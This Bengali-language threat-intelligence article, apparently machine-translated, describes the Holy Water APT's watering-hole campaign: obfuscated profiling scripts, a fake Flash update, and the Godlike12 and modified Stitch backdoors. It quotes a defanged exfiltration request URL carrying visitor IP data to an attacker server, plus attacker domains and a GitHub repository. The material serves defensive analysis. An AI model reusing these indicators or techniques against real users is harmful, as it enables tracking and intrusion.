পবিত্র জল APT

হলি ওয়াটার এপিটি হল সাইবার অপরাধীদের একটি গ্রুপকে দেওয়া নাম যেটি একটি এশিয়ান ধর্মীয় এবং জাতিগত গোষ্ঠীর বিরুদ্ধে ওয়াটার-হোল ধরণের আক্রমণের একটি সিরিজ পরিচালনা করেছিল। এই বিশেষ আক্রমণের টিটিপি (কৌশল, কৌশল এবং পদ্ধতি) ইতিমধ্যে পরিচিত এটিপি (অ্যাডভান্সড পারসিসটেন্ট থ্রেট) অভিনেতাদের কাউকে দায়ী করা যায়নি, যা গবেষকদের এই সিদ্ধান্তে পৌঁছেছে যে এটি একটি নতুন সাইবার অপরাধী গ্রুপ যা বৈশিষ্ট্যগুলি প্রদর্শন করে। হ্যাকারদের একটি ছোট এবং নমনীয় দল।

একটি জল-গর্ত আক্রমণ পরিচালনা করার জন্য, অপরাধীরা বেশ কয়েকটি ওয়েবসাইটকে টার্গেট করে যেগুলি নির্ধারিত লক্ষ্যগুলি দ্বারা ঘন ঘন পরিদর্শন করা হয়। সাইটগুলি লক্ষ্যযুক্ত গোষ্ঠীর অন্তর্গত সংস্থা, দাতব্য বা প্রভাবশালী ব্যক্তিদের অন্তর্গত হতে পারে। হলি ওয়াটার দ্বারা আপোস করা সমস্ত ওয়েবসাইট একই সার্ভারে হোস্ট করা হয়েছিল এবং অন্যান্যদের মধ্যে একটি ধর্মীয় ব্যক্তিত্ব, দাতব্য, স্বেচ্ছাসেবী পরিষেবা প্রোগ্রাম এবং একটি ন্যায্য বাণিজ্য সংস্থা অন্তর্ভুক্ত ছিল।

আক্রমণ একাধিক পর্যায় অন্তর্ভুক্ত

একটি আপস করা ওয়েবসাইট পরিদর্শন করার পরে, ব্যবহারকারী প্রথম আক্রমণের পর্যায়ে প্রবেশ করে যেটিতে (script|jquery)-css.js নামে একটি দূষিত জাভাস্ক্রিপ্ট থাকে এবং সোজসন, একটি চীনা ভিত্তিক ওয়েব পরিষেবার সাথে অস্পষ্ট হয়৷ এই স্ক্রিপ্টের ভূমিকা হল ব্যবহারকারী একটি বৈধ লক্ষ্য কিনা তা নির্ধারণ করা এবং এটি করার জন্য পেলোড ভিজিটরের ডেটা স্ক্র্যাপ করা শুরু করে এবং HTTP GET অনুরোধের মাধ্যমে loginwebmailnic.dynssl[.]com এ একটি বহিরাগত সার্ভারে পাঠাতে শুরু করে:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

সার্ভার থেকে প্রতিক্রিয়া একটি সত্য বা মিথ্যা ফলাফল প্রদান করে, এবং যদি মান সত্য হয়, আক্রমণের পরবর্তী পর্যায়ে ট্রিগার হয়; অন্যথায়, কিছুই ঘটবে না।

দ্বিতীয় ধাপের সময়, (script|jquery)-file.js নামে একটি জাভাস্ক্রিপ্ট, যা আবার একই পদ্ধতিতে অস্পষ্ট। তবে এবার হ্যাকাররা v4 এর পরিবর্তে Sojson v5 ব্যবহার করেছে। ব্যবহারকারীকে সংক্রমিত করতে, হলি ওয়াটার এপিটি কোনো সফ্টওয়্যার দুর্বলতা বা দুর্বলতাকে কাজে লাগায় না। পরিবর্তে, একটি ফ্ল্যাশ প্লেয়ার আপডেট অফার করে একটি পপ-আপ উইন্ডো তৈরি হয় এবং সম্ভাব্য শিকারকে ফাইলটি ডাউনলোড করতে সম্মত হতে হয়।

হোলি ওয়াটার এপিটি-এর আর্সেনাল অফ ম্যালওয়্যার টুলস GitHub-এ হোস্ট করা হয়েছিল

ব্যবহারকারী যদি জাল ফ্ল্যাশ আপডেটকে এগিয়ে যাওয়ার অনুমতি দেয়, তাহলে এটি github.com/AdobeFlash32/FlashUpdate- এ অবস্থিত একটি আর সক্রিয় GitHub সংগ্রহস্থলের সাথে সংযোগ করে। সেই স্থানে চারটি ভিন্ন ভিন্ন সেটের টুল সংরক্ষণ করা হয়েছিল - একটি ইনস্টলার প্যাকেজ, গবেষকদের দ্বারা নামকরণ করা একটি ব্যাকডোর ম্যালওয়্যার Godlike12 , এবং স্টিচ নামে পরিচিত একটি ওপেন-সোর্স পাইথন ব্যাকডোরের দুটি সংস্করণ , যা হ্যাকারদের দ্বারা প্রসারিত কার্যকারিতা সহ সংশোধন করা হয়েছিল৷ আপডেট প্যাকেজটি একটি NSIS ইনস্টলার যা একটি বৈধ Windows Flash Player ইনস্টলার এবং একটি স্টেজার টুল ড্রপ করে যা প্রকৃত পেলোড লোড করতে ব্যবহৃত হয়। Godlike12 ব্যাকডোরটি Go ভাষায় লেখা এবং কমান্ড এবং কন্ট্রোল (C&C, C2) সার্ভারগুলিতে একটি Google ড্রাইভ চ্যানেল প্রয়োগ করতে ব্যবহৃত হয়। স্টিচ ব্যাকডোর ভেরিয়েন্টের জন্য, তথ্য এবং পাসওয়ার্ড সংগ্রহ, কার্যকলাপ লগিং, ফাইল ডাউনলোড ইত্যাদির মতো সাধারণ ব্যাকডোর ক্রিয়াকলাপ ছাড়াও, হলি ওয়াটার গ্রুপ স্বয়ংক্রিয় আপডেটের জন্য একটি বৈধ অ্যাডোব ফ্ল্যাশ ইনস্টলেশন প্রোগ্রাম ডাউনলোড করার ক্ষমতা যুক্ত করেছে। নিজেই ubntrooters.serveuser.com থেকে এবং নির্ধারিত কাজগুলিকে কাজে লাগিয়ে অধ্যবসায় অর্জন করে।